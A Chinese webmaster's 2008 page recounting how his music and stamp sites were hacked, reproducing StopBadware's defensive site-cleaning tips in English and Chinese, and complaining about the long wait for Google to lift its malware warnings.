Take the site offline in order to keep from putting your site's visitors and your customers at risk. Then remove all of the offending code and fix all underlying security vulnerabilities before putting your site back online. Finding and removing a specific block of bad code that a hacker has inserted can clean your site for a time, but keeping your site from being infected in the future will require fixing the security vulnerabilities that allowed the hacker to insert the code in the first place. As such, be sure to check for and remove any backdoors left by the attacker. A backdoor will allow an attacker to get back into your site even after you have locked down the site.

Your hosting provider should also be able to help you figure out where the underlying vulnerabilities on your site are, so contacting them should be a top priority if you think your site has been hacked. You can also check your hosting provider's forums to see if any other webmasters using that host have been compromised. Checking user forums for the software used by your site can also help you see if other users have been compromised through flaws in the software, or if there are security updates which your site does not yet have in place.

Preventing badware in the future
1. Check software for badware before making it available for download
See section 1.1 above for general information on badware and our software guidelines.

2. Check links for badware before posting them to your site
See section 1.2 above for general information and our guidelines about badware in links.

3. Use only reputable, conscientious ad providers and regularly monitor them to be sure they stay clean
Make sure your ad network is reputable and actively screens for badware from advertisers. If not, switch and tell them why you switched. Remember that an ad hosted on your site, even if provided by a third party, is still a part of your web page. You should only accept ads from providers that you are confident are diligent about protecting clients from badware. You can use StopBadware's reports as a resource. StopBadware is working to bring the worst ad networks to light by posting reports showing websites that we've seen being victimized by ad providers.

4. Monitor user-generated areas of your site
Make sure your terms of use for posting to forums, blogs, and other user-generated areas of your site explicitly forbid posting links to badware. You may also choose not to allow users to link directly to any form of executable file or to insert javascript into forum messages or other user-generated content areas. Then actively monitor these areas of your site for suspicious links or executables. See section 1.2 above for general information and our guidelines about badware in links.

5. Close security loopholes to secure your site against hacking
Some basic steps that can be taken to make your site more secure include the following:

Use strong passwords.
Use SSH and SFTP protocols, instead of telnet or FTP. Telnet and FTP are both considered insecure because of their use of plain text protocols. They transmit usernames and passwords in a way that anyone with access to the network can read. SSH and SFTP are based on an encrypted protocol which prevents eavesdropping.
Scan your site for security vulnerabilities using a vulnerability auditing scanner (both free and commercial versions are available). Use security update management tools to detect missing patches and then apply those patches immediately.
Keep up to date on news relating to any software you or your host use on your site, and make sure you are always running the most recent versions, including security patches. Subscribe to, and regularly read, any newsletters or alerts offered by your hosting provider and software providers.
Make sure your hosting provider keeps all software updated, including security patches. If they do not, urge them to do so or switch to a hosting provider that you are confident does its best to keep its clients' websites secure.
When your site is clean, secure, and back online, you may want to notify your site visitors about the badware problem, and the steps you've taken to address it. If a user has become infected with badware after visiting your site, knowing what you've found will help them clean up their own computer. And telling your story can help other webmasters deal with similar situations on their own sites. If you'd like to share your story of how you cleaned your site with other webmasters, or would like to share tips for keeping websites secure, please visit our discussion list.

This page is an evolving resource. If you have further questions or suggestions for additions, please join our discussion group and share your ideas.

像这样一个洋洋近万言的技术性文章,依笔者的水平去翻译,没有个把星期是难以完成的,而且还很难保证它的技术准确性.因此这个任务还是留待给有水平的朋友去完成吧.不过为了使英文有困难的朋友对其有所了解,下面试以简单摘要的形式做一些说明:
标题: 为了清理和保护您的网站
维护一个干净的空间有三个基本步骤:
1. 鉴别你网站中的有害软件
以下是有害软件常见的类型:
1. 从你的网站下载的第三方软件中捆绑了有害软件
2. 你的网站所链接的某些空间含有有害软件或可直接自动运行的有害程序
3. 你的网站所使用的广告带有有害软件
4. 如果你的网站有供用户发帖或上传文件的空间,这里就潜伏了出现有害软件的可能
5. 黑客攻击了你的网站. 以下是两种常见的"注入攻击"的类型:
--不可见的 iframes 标记. iframes 是在网页中常用的一种标记,例如在博客的帖子中插如一个特定的播放器.但是它也常被黑客所利用以传播有害软件.这时它的特点是在其代码中带有 width="0" 和 height="0" (笔者注,意为长度或宽度为零),而且它通常是被插入网页的最顶端或者最底部
--模糊的代码. 这种代码常常是有用的.例如作者为了禁止防问者随意拷贝他的作品,但它也常为黑客使用.一般它被采用以下两种方式:一种是hex字符,它被使用在javascrip编码的字符串中,这时你可以看到在一个百分比的符号后面带有两个字符((例如 %AA%BB%CC); 另一种是unicode编码,这时你会看到在"\u" 符号后面带有四个字符 (例如\u0048\u0069\u0021).
这些代码本身可能是无害的,但是它可以使网页被访问是自动链接到一个含有有害文件的网站(甚至这个网站也是一个被害者)或是自动执行某些有害的文件 (这些文件大多带有.exe, .bat, .cmd, .scr, and .pif.的后缀).检查这些有害代码的方法是从虚拟主机上下载所有的含有编码的文件,然后用杀毒或是反间谍软件去扫描它们.
2. 从你的空间中移除这些有害软件
1. 移除你的空间所提供的有害软件
2. 取消所有有害的链接
3. 取消所有有害的广告
4. 删除有害的帖子.如果有必要,取消所有发帖或上传的功能
5. 如果你的网站已经受到了黑客的攻击,首先要停止网站的运行以免来访者受到毒害;然后下载所有的网页,清楚有毒的代码再重新上传.为了不再遭受攻击,必须要检查黑客得以攻击的入口并堵死这些漏洞.你还可以从ISP(空间提供商)那里取得帮助,请他们协助检查漏洞,还可一从他们的论坛中查看是否还有类似的情况发生.
3. 防止未来在你的网站中出现新的有害软件
1. 在提供任何供下载的软件之前要检查它是否带毒
2. 在你的网站使用任何外部链接之前要确认它们是否无毒
3. 仅仅使用具有良好资质和信用的广告商提供的广告.要知道,你使用的任何广告都将是你的网页内容的组成部分,保护防问者免受毒害也是你的责任
4. 严密地监视任何用户使用的区域,例如论坛,博客和其它类型的区域.你可以禁止上传任何可执行程序,javascrip编码并认真地监视任何可疑的动向
5. 堵住任何可能受到攻击的漏洞以保护你的网站. 以下一些措施可以使你的网站更加安全:
--使用高强度的可靠的密码
--使用 SSH 和 SFTP 协议代替 telnet 或者 FTP 协议.前者是基于一个防窃听的加密协议的
--使用漏洞扫描器(免费版和商业版都是可用的)检查你的网站并及时发现和堵住漏洞
--对你的网站所使用的有关软件即时升级,使用它们的最新版本以堵塞任何可能产生的漏洞
--敦促和确认你的主机提供者(ISP)经常升级他们的程序,包括堵塞任何可能遭受攻击的漏洞.必要时,选用更为可靠的空间
当你的网站清除了有害软件并恢复运行之后,你应该向访问者说明出现有害软件的经过.如果有任何用户在你的网页中遭到里了毒害,你应该尽可能地帮助他消除这种毒害.说明这些经历还可以帮助其他的站长避免类似的毒害.如果你愿意和大家共享你的经历,请访问我们的讨论区
这是一个有待进一步完善的资料.如果你有任何问题或建议,请加入我们的论坛以共享你的见解
 
 
 
在浏览了上面的资料网页之后,回顾近一个月来本站所发生的病毒问题,几乎涵盖了此文中所列出的2-4点的所有类型,文章的内容和所提出的措施对于每一位站长而言的确非常有益.
按照GOOGLE来件的提示,2008.1.30.笔者打开了信中所提的网页 http://www.google.com/support/webmasters/bin/answer.py?answer=45432 一开始,显示的是一个英文界面.不过在它的右上角有一个语言选项,(Change Language),只要选择其中的中文项就可以转到中文界面了.这为很多中国朋友提供了很大的方便.不过这个网页设计的不太好,初次访问很难找到它的注册入口.您需要先进入它的"Google 网站管理员工具"(在该页左侧的导航拦),打开一个新的页面,再在这个页面的右中部找到"登录"(对已有GOOGLE帐户的人)入口进入.如果还没有帐户,就要从其下面的"创建 Google 帐户"链接进入,完成注册手续后再登录进入.虽然有点不便,但它的确是一个很好的站长工具.在输入网站域名之后可以找到很多功能,特别是它新开辟的Analytics(分析)工具,对于站长进一步了解网站运行情况以及自己的网站和GOOGLE的各种关系非常有用,建议各位站长一定要花些时间去仔细研究.
在完成了注册登录以及站长身份验证等手续等程序之后,笔者当即提交了重新审核的要求并等侯结果.1月31日笔者查看了大部分使用外语的GOOGLE搜索引擎(英,法,德,意,日等等),发现本站的带毒消息已全然消去,恢复了正常.但唯独中文的搜索结果依然如故,未见改动,不知是何原因.为此,笔者已再次提出重新审核的要求并给"GOOGLE搜索质量小组"发去了一封回件,提出这一问题要求解决.
 
2008.2.1.给GOOGLE搜索质量小组的回件
Dear sirs of Google Search Quality Team,

Thanks for your E-mail and important information, even though it seems too late.

It is sure that my web site was attacked by the hackers for many times since Dec.22,2007. These problems have been solved up to Jan.15,2008. All history has been published in my web page ../master/master-015.htm. I have browsed your wed page http://www.stopbadware.org/home/security . It give me much knowledge about the virus and hacker, 2-5 point of them mentioned by the page, just is that I have suffered in this time. For share the history, I have submitted a post in your forum today (name: qilingren)

I have submit a request as your prompt on Jan.30,2008. and I have checked your search result for "Morricone's music" or "莫里康音乐" yesterday, all results of English or other language (example French, German, Italian.....) have shown normal, but only Chinese search result is still harmful. So I have to submit request again today, I hope you will care and help to solve the thing.

With best regards

A Chinese webmaster HAN

译文: 亲爱的GOOGLE搜索质量小组先生们:

感谢您们地电邮和它的重要信息,尽管它似乎太晚了些

从2007年12月22日起,我的网站确实遭到了黑客的多次攻击.直到2008年1月15日,这些问题已经得到了解决.所有的经过已发表在我的网站的网页上 ../master/master-015.htm 我已经浏览了您们的网页 http://www.stopbadware.org/home/security . 它给了我很多关于病毒和黑客的知识,文章提到的2-5点,正是在这次事件中我所遭遇的问题. 为了和大家共享这段经历,今天我已在您们的论坛上发布了一的帖子(名字 qilingren)

在2008.1.30. 按照您们来件的提示,我已经提交了要求重新审核的申请,昨天,我在您们的搜索引擎中输入"Morricone's music" 或者 "莫里康音乐" 以进行检查,所有的英语和其它外语(例如法文,德文,意文....)站的搜索结果都已显示正常,但唯有中文站的搜索结果仍然显示是有害的.所以我不得不在今天再一次提出了重新审核的要求,我希望您们也能关心和帮助解决这个问题

最好的祝愿

一个中国站长 HAN

 
2008.2.2.笔者在GOOGLE论坛所发的帖子(见这里 或 这里)

黑客遭遇记

2007.12.22-2008.1.16 我的网站连续发生了多起黑客攻击和有害链接造成的网页带毒事件.几乎涵盖了http://www.stopbadware.org/home/security 网页中所指出的各种网站受害类型.经过一个多月的努力,陆续查清了原因并逐渐恢复了正常运转.为了和诸位站长共享这一段艰苦经历所带来的教训,我已在 ../master/master-015.htm 我的网站网页上比较详细地介绍了整个过程.欢迎大家访问交流

有几点重要的问题在此说一下:
1.最后一次带毒是由太极链统计代码引起的.我已和他们联系.他们说他们正在和GOOGLE沟通此事.但何时解决不好说.我们实在等不起,我只好将其代码全部删除.杀毒软件的带毒提示立即消除了.另外据我的ISP告诉我,ITSUN统计也有类似问题(这些天该站似已停止服务),正好我也在用它的统计,所以也一并删除了,特告知在使用这两个统计的朋友

2.现在的互联网形势,可以用"环境险恶"四个字来形容.我看到全国互联网举报中心公布的举报数字每个月就有两万多件,平均每天700件.真不知他们是否忙的过来.因此只有自己先扎紧篱笆,防范野狗,千万不要麻痹大意.现在大家常用的各种ASP程序,漏洞不少,对于大多数非专业IT人士的站长来讲,要想完全堵死漏洞实在困难.本人思量再三,下决心舍卒保车.停用了包括留言本,统计,论坛,博客,ASP上传功能等等在内的一切ASP程序,只留一条EMAIL联系通道,虽感至痛(这里有几百位朋友的心血,虽有备份并准备在网页上陆续整理发表,但毕竟是一个极大的损失),但为了从根本上防止病毒重来,也只好忍受这断臂之痛了.也请各位站长慎思

2008.2.3.
 
2008.2.16 新续
2008.2.14.本站收到了HANYUXING朋友的邮件,其内容如下:
站长你好 不知道网站是否还受到恶意程序的威胁,下面这篇文章是我订阅的Google的rss新闻(呵呵最近在家拨号上网) 发现的一篇文章,不知道您是否看过 希望能对您有所帮助。


关于"恶意软件警告"
2007年12月19日 星期三,17:25:59 | joydandan
发表者:Google(谷歌)技术支持
近期,很多用户和网站都在向我们询问关于 Google(谷歌)搜索结果中恶意软件的网站提醒功能的,即搜索结果中出现标示警告"该网站可能含有恶意软件,有可能会危害您的电脑。"谷歌网页搜索上的恶意软件警告是谷歌在今年年初与 StopBadware.org 合作发布的一项功能。除了保护用户不被联接至传播恶意软件的网站,希望将用户受到恶意软件危害的几率降至最低之外,我们更想帮助网站管理员们保护自己的网站。我们发现,有很多被标示警告的网站并非有意散布恶意软件,而是被黑客入侵而深受恶意软件的危害。
当网站管理员发现问题的时候,我们推荐大家使用谷歌网站管理员工具(https://www.google.com/webmasters/tools/siteoverview?hl=zh-CN)简化后的审查程序包含四个步骤:
1. 在站长工具里看一看被感染了恶意软件的 URL 的样本。
2. 根据 StopBadware.org 网站的安全提示对您的网站作出必要的改动。
3. 使用站长工具要求谷歌重新评估您的网站。 我们会检查您的网站还有没有恶意软件。
4. 您可以检查我们重新评估的状态。
* 如果我们觉得您的网站仍是有害的,我们会提供您网站中危险 URL 的最新名单。
* 如果我们确认您的网站已经是正常了,您可以期待我们很快(通常是 24 小时以内)清除关于您的网站有恶意软件的信息。
谷歌鼓励所有站长去熟悉 Stopbadware(http://www.googlechinawebmaster.com/2007/09/blog-post_25.html) 的恶意软件预防小技巧。如果你有其他问题,请阅读相关文献或在讨论组上发帖。我们对大家为认识和预防恶意软件的努力表示感谢。
按照该邮件的提示.笔者打开了那个Stopbadware网页,发现这恰是前面笔者作了简译的那篇文章的中文版!啊,这太好了.为了大家的方便,现将其复制于下:
阻击恶意软件--清除和保护你的网站的小技巧
2007年9月25日 上午 05:20:00

译自:StopBadware.orgTips for cleaning & Securing Your Website

译者按: StopBadware.org是一个独立于Google的致力于消除恶意软件(badware)的非盈利组织。根据StopBadware.org对恶意软件(亦称流氓软件)和恶意软件网站的定义,Google对索引中带有恶意软件的搜索结果会加上“This site may harm your computer” 或 “这个网站有可能会损害您的计算机”。如何清除恶意软件并保护你的网站不受恶意软件的侵犯?StopBadware.org在他们的英文网站上给出很多非常实用的小技巧。我们刚刚翻译了StopBadware.org的恶意软件网站指南,在此,我们继续为广大中文站长翻译StopBadware.org关于阻击恶意软件的小技巧。


清除并保卫你的网站的小技巧

这篇文章提供从网站上清除恶意软件并保持网站干净的方法。它是一个起始点。之所以是起始点,是因为我们应该会不断更新它并提供更多的方法。请注意,这篇文 章中的方法绝不是全面的或详尽的。我们只想把它作为是关心恶意软件的站长们要做的第一步。我们鼓励站长们和网站寄存服务商们撇开这里所提供的建议,独立研 究网站的安全。获取关于网站安全问题的最新消息是站长和网站寄存服务商们自己的责任。 通常有三个基本步骤来保持一个网站的洁净:

恶意软件的识别
恶意软件的清除
恶意软件的预防


恶意软件的识别
让您的网站保持不受恶意软件侵犯的第一步是检查你的网站上是不是已经有了恶意软件。恶意软件往往根本不顾用户选择如何使用他们的计算机。有些应用软件是恶意软件,因为他们的行为是欺骗性的或不可逆转的(例如,有的应用程序秘密安装难以或根本无法卸载的间谍软件)。还有些应用软件是恶意软件,因为他们有不良行为(如显示弹出式广告或改变用户的主页设置)。这些行为往往事先不让用户知道,也无从得到用户的同意。你可以从我们的软件指南中学到更多东西。 这里是一些你应该查一查的常见的恶意软件类型:

(译者按: 如果你的网站被Google在搜索结果加上"恶意软件“标记,或是在谷歌站长工具里的某个网站概括中有一个恶意软件标签,那么你在站长工具里可以看到你的感染了恶意软件的URL的样本。)


1. 你的网站有可以下载的恶意软件

根据StopBadware的软件指南,评估你提供下载的软件(包括任何第三方捆绑在你的软件上的应用软件)。如过你提供下载的软件违背了我们的指南,它就构成了恶意软件。

如果你的软件和第三方应用程序捆绑,你可能还需要检查是否捆绑软件会安装任何危险性或欺骗性的代码。一个检测方法是,下载整个捆绑软件到一个虚拟机,然后使用反病毒或反间谍软件对它扫描。

2. 在你指向的网站中存在的恶意软件

如果你的网站链向恶意网站,你的网站访问者就处于危险之中,哪怕是恶意软件或代码漏洞实际上不寄存在你的网站上。在以下情况下,你的网站可能违反了我们的网站指南:如果你的网页自动重定向到一个寄存或传播恶意软件的网站; 直接链接到恶意软件的可执行文件上; 链接到另一个企图自动安装恶意软件到用户电脑的网站; 或者是含有大量链接到其他主要是寄存或传播恶意软件的网站。 有一些方法可以判断你网站上的链接是否违反了我们的指南。检查你的所有链接,看是否有些链接会让用户下载其他网站上的恶意软件,或导致用户去访问其他网站上已被恶意软件感染的网页。(我们建议你在找恶意软件的时候用一个虚拟机,以避免损坏你自己的电脑)。以下方法也可能是有用的:通过搜索你的网站的源代码来并寻找到不明网站的链接,特别是到可执行文件的链接。可执行文件的扩展名包含.exe, .bat, .cmd, .scr, 以及.pif。有的应用软件可让您对一个网页的恶意链接进行扫描。你也可以使用这些应用程序来帮助决定是否链接到该网页。 您也可以把StopBadware报告以及我们的恶意软件网站清除站作为一种资源。你可以查询我们的数据库来得到你已经链接到的或者是想要链接到的网站和软件的信息。

3. 通过你网站上的广告传播的恶意软件

在你的网站上发布的广告是另一种恶意软件的潜在来源,因为大多数的广告包含到一个外部网页的直接链接。关于通过链接找出恶意软件的指南信息,请参阅第以上的1.2节。如果你在你的网站上展示第三方的广告,请确保那些链接不被引向不良软件或被恶意软件感染的网页。评估通过广告传播的软件的方法类似于在上面第1.1节描述的方法("你的网站有可以下载的恶意软件")。

您也可以把StopBadware深度报告以及我们的恶意软件网站清除站作为一种资源。使用我们的数据库来检查你正在考虑使用的广告网络,以了解是否有其他网站已经因为那些广告商而产生了恶意软件的问题。

4. 贴在你网站的用户区上的恶意软件链接

如果在你网站的任何部分,用户可以张贴或上传内容,这些地区可能是一个潜在的恶意软件或恶意软件链接源。关于恶意软件和恶意软件链接,请参阅上面的1.1节及1.2节。

5. 你的网站受到黑客攻击

另一种常见的恶意软件网站来自黑客攻击。黑客攻击是第三方在安全性很低的网站上插入代码或可执行文件。一个常见的例子是"注入攻击",即黑客利用安全漏洞来在你的一个网页上注入有害代码。通常这个代码对你及你的用户来说是不可见的,但它会在一个访问者的电脑后台触发恶意软件的下载。你经常通过察看你的网页的源代码来发现这种攻击是否发生,从而确定它是否包含你从来没写过的任何代码。

两种常见的"注入攻击"类型是:

无形的隐藏框架(invisible iframe)

Iframe标签是一种HTML标签。一个iframe在一个网页上创建一个小"窗口",在这个内嵌窗口中可以载入另一个页面。Iframe并非总是用于不可告人的目的; 它被经常用来,举例来说,在博客中嵌入一个视频。当恶意黑客使用它时,iframe可以被设置成小到看不见。访问受感染网页的用户永远不会知道另一页也在小iframe窗口里被载入。如果你在你网站上的一页中看到一个iframe的宽度是"0",高度也是"0"的代码,你就找到了一个看不见的iframe。Iframe最常见的是被插在网页源代码的最上端或最底端。检查iframe应首先检查开始网页标准代码的<html>标签前,或结束网页代码的</html>标签后。

混淆代码 (Obfuscated Code)

混淆代码或脚本通常被隐藏在你的网站正常代码中,所以他们可以很难被察觉。这些代码是专门为了防止自动化查找工具发现他们。混淆代码不一定是恶意软件; 一些合法的编程者故意混淆编码以防止他人复制自己的工作。但是,如果你为你网站写的代码并不是想故意混淆,找到一块混淆代码可能说明有一个注入攻击。最常见的两种混淆代码的方式是通过编码和加密。

编码有时会很容易被看到,因为编码或者使用十六进制, "unicode”, 或“宽"字符。如果是十六进制字符,你会看到javascript代码的字符串由一些百分号后加两个字符的组合组成(例如%AA%BB%CC)。如果是unicode字符,你会看到字符串由一些"\u"紧随着四个字符组成(例如:
\u0048\u0069\u0021)。一般而言,编码成这种方式的代码块会占用若干段落。如果您在你的网页源代码里发现大块上述模式中的任何一种,它很可能是混淆代码。 加密代码更难被找到,因为他们没有一套模式。然而,加密代码看上去会像一块费解的文字。即使你不熟悉javascript编程,你会注意到你的网站上正常的javascript代码会使用基于常用英语单词的语法。编码或加密了的文本看上去就是完全不能理解的字母,数字和符号块。你应检查你网站日志来看看有没有对你所不认识的可执行文件的引用。可执行文件的扩展名包含.exe, .bat, .cmd, .scr, 以及.pif。

虽然大多数黑客的攻击重点是html代码,坏软件本身也有可能被上载到安全性很差的网站。不良软件可能包括不明的可执行文件(譬如以.exe, .bat, .cmd, .scr, 以及.pif结束的文件),javascript文件,甚至把图片上传到您的网站而你并未发觉。有时攻击者仅仅想利用你的网站来寄存恶意软件,然后从其它受害网站链接到该软件。这里有一个检测你的网站是否被寄存了不良软件的方法,即从你的正在运行的网站中下载所有的源代码到一个虚拟机,然后使用反病毒或反间谍程序进行扫描。

恶意软件的清除


如何从你的网站去清除恶意软件取决于你的网站寄存或链接了什么样的恶意软件。我们一般建议你在清除恶意软件和加强安全性之前先使你的网站离线,以防止你的网站访客者在你清除过程中被不知不觉地感染。

1. 如果你的网站寄存了可下载的不良软件

从你的网站上删除不良软件,不要再让它可供下载除非你确保它不是坏软件。你可以在我们的指南里了解更多关于什么是恶意软件的知识。如果你是一个问题软件的作者,StopBadware为如何使您的软件符合我们的指南提供了一些建议。

2. 如果你的站点链接到恶意软件

从你的网站上清除所有到恶意软件的链接。

3. 如果你的网站上的广告链接到恶意软件

删除所有链接到恶意软件的广告。如果你使用一个广告网络,这可能意味着从你的网站上删除该网络的所有广告,直到你肯定该广告网络是干净的。你也许可以联络你的广告商,让他们知道他们在你的网站上的一个或多个广告是恶意软件链接。

4. 如果恶意软件是从你的用户区得到的链接

从你的站点删除恶意软件的链接。你可能要编辑用户的帖子以消除恶意软件内容,或删除用户的整个帖子。

5. 如果你的网站已经被黑了

首先让你的网站离线,这样你网站访客和你的客户就不会有访问风险。然后删除所有不良代码,修复所有安全漏洞。最后才把你的网站重新上线。发现并去除特定的黑客插入的坏代码块以使你的站点干净是一时的。要使你的网站将来也不受到感染,你必须修补安全漏洞来防止黑客在你的网站插入代码。因此,一定要确保消除任何攻击者留下的后门。黑客留下的后门会使他们重新回到你的网站,即使你封锁了你的网站。 你的寄存服务商也应该能够帮助你查出你网站的安全漏洞,所以如果你认为你的网站已经被黑,和他们联系应该是当务之急。你也可以察看一下你的寄存服务商的论坛,看看使用该寄存服务的其他网站是否也已经被攻破。访问你网站所使用的软件的用户论坛也可以帮你看看有没有其他用户因为软件漏洞而失密,或者是你的网站没有对该软件的安全补丁进行更新。

恶意软件的预防

1. 在让网站可下载软件之前进行恶意软件检查

请参阅以上的第1.1节了解关于恶意软件及我们的软件指南的信息。

2. 在你网站链接到其他网址前对链接进行恶意软件检查

请参阅以上的第1.2节了解我们的关于链向恶意软件的信息。

3. 只使用有信誉、有良心的广告商,并定期监测以确保他们的广告是干净的

确保你的广告网络是有信誉的并积极为广告主屏蔽恶意软件。如果他们不这么做,赶紧换人,并告诉他们你为什么要换。请记住,一个在你网上的广告,即使是由第三方提供的,仍然是你的网页的一部分。你应该只接受来自为保护客户不受恶意软件侵害而不懈努力的广告商。你可以使用StopBadware的报告作为恶意软件广告商的一种来源。StopBadware正致力于把最坏的广告网络通过报告的形式来曝光,报告我们所看到的被这些广告提供者害苦了的网站。

4. 监控你网站的用户区

确保你网站的论坛,博客,和其他用户区的使用条款中明确禁止链接至恶意软件的帖子。您也可以选择不让用户直接连接到任何形式的可执行文件或插入javascript到论坛帖子或其他用户生成内容区。你要严密监督你网站的这些区域以防止可疑的链接或可执行文件。请参阅以上的第1.2节了解我们的关于链向恶意软件的信息。

5. 堵住安全漏洞以防黑客攻击以下是使你的网站更安全的一些基本步骤:

使用复杂的密码。

使用SSH和SFTP协议,而不是telnet或FTP。Telnet和FTP都被认为是不安全的,因为他们使用纯文本协议。他们传送的用户名和密码可以被任何接入网络的人读懂。SSH和SFTP都是加过密的以防止窃听。

利用漏洞审查扫描器(有免费的和商业的版本)来扫描你的网站的安全漏洞。使用安全更新管理工具,以查找被错过的补丁。一旦找到,要立即应用补丁程序。

跟踪你网站或者你的网站寄存商使用的软件的最新消息,永远运行最新版本,其中包括安全补丁。订阅,并定期阅读你的寄存服务商和软件提供商的任何通讯或警报。 确保你的寄存服务商保持所有软件的更新,包括安全补丁。如果它们不这么做,敦促他们这样做或转换到另一家能为客户的网站安全竭尽全力的网站寄存服务商。


当你的网站变得干净、安全后再重新上线,你可能想通知你的访问者你们所遇到的恶意软件问题,以及你解决问题的措施。如果一个用户因为访问了你的网站而已感染了恶意软件,让他们知道你的发现会帮助他们清理他们的计算机。讲述你的故事可以帮助其他管理员处理在自己网站上的类似情况。如果你想和其他站长分享你如何清洁你的网站的故事,或者想分享如何保持网站安全的小技巧,请访问我们的讨论组。 这一页是一个不断被更新的资源。如果你有进一步的问题或建议作为补充,请加入我们的讨论组分享你的想法。
标签: badware恶意软件

固定链接 3个评论

 
 
感谢HANYUXING朋友提供的这个重要信息.如果有必要,建议您最好阅读原网页,并从其中的许多参考链接中找到您所需要的东西.祝各位站长提高警惕,增长才干.把那些可恨可恶的东西拒之门外,让自己的网站更好地为广大网友服务.
HANYUXING 朋友的个人专页见这里
 
 
2008.3.18再续
虽经多次多渠道联系Google 和 StopBadware.org ,两个多月时间过去仍如石沉大海,不见回音,我已对Google和它的这位查毒伙伴失去了信心.看来这些IT巨头并非完美可信,它的很多事情也急需改进.这个报毒的新措施尽管看起来对访问者有利,但它只管报毒而不管收场的作法实在令人厌恶.而对已经修复的网站不给于及时平反的作法,不仅损害了网站所有者的利益,也损害了Google自身的信誉,最终还因其虚假情报而伤害访问者的利益.这样不负责任的行为早晚会要引起公愤.如果它是中国的网站,既使不打官司,我也一定会找地方去投诉它.
不过事情总算有了转机,2008.3.12-3.15 笔者和老伴以及女儿,外孙赴香港旅游,(参见此页)回来之后,打开电脑作例行检查,终于发现Google有了反应,在音乐站上原有的的带毒提示已全然隐去,不过另一的网站"邮探世界名人的带毒提示依然如故,见下图:
2008.3.15 Google 搜索结果截图 (请参阅本页上部图6以对比)
2008.3.15 Google 搜索结果截图
掐指算来,如果从2008.1.16 网站完全修复算起,到2008.3.12为止已经整整过了56天.尽管这音乐站终于平了反,但另一个集邮站仍在蒙受着不白之冤.倒底还要多久才能完全摘掉这顶被Google只戴不摘的帽子,让我们耐心地拭目以待吧!但愿大名顶顶的Google能迅速纠正它的错误.
 
2008.4.11 补记
今天打开GOOGLE,输入"莫里康音乐"查看,最后一个不白之冤终于洗去了,见下图
2008.4.11 GOOGLE搜索结果
如果从前面所说的2008.3.12算起,又整整延迟了一个月,总计达96天.在世界互联网数据传送速度已创造了每秒9.08G记录(见这里)的今天,GOOGLE作为当今互联网的新兴巨头之一,需要花这样长的时间才能纠正它自己的错误,实在是令人不解和遗憾.面对GOOGLE论坛里每天出现的大批站长发出的质疑甚至责问的的帖子(见这里),GOOGLE实在是应该检讨一下自己的开发策略了.但愿不久我们将看到一个更有效率,更负责任的新GOOGLE出现在我们面前
 
 
事有巧合,当天晚上(2008.4.12), CCTV在高端访问中播出了"专访谷歌首席执行官施密特"的节目.出于对Google的关心和疑问,我把这段节目录制了下来,在此提供给和我有近似需要的朋友.以下是在CC联盟存放的这段视频.350Kbps WMV格式,37分42秒(开头短缺了一点)
在这段节目中,除去使我们更多地了解Google的发展历程和它的特点之外,我特别注意到其中施密特所说的两段话:一段是"...因特网讲究的是速度,中国也讲求速度,美国也一样,速度十分重要....而且我们认为Google是最好的....通过我们的算法和速度,我们能作的最好"(13'25"-14'07"); 另一段话是"最重要的事情是我们是否雇用了最聪明最优秀的员工"(22'33").从这些话来看,至少对于速度问题的认识,这位高端领导者和我们的认识是一致的.不过对于Google是否作的最好.则应另作分析了.在及时取消不实的带毒警示这个问题上,不要说是"作的最好",恐怕连及格都不够.但愿Google在这个领域所雇用的员工能是最聪明最优秀的员工,他们能够认识到问题的严重性并迅速加以纠正.如果今后仍然不见改进,为了我们的自身利益,也为了Google的形象和他的长远利益,我会寻求各种渠道向这位首席执行官反应问题并要求认真处理的.
祝愿Google能永葆青春,在互联网的激烈竞争中立足于不败之地!
2008.4.27

Home-mobile
 
主域名 备用域名 邮币卡转让

本站2003年建站 主页 ../ 备用域名 http://em.hty66.com 2014信息产业部备案: 苏ICP备11039856号 © 2015 hwg 版权所有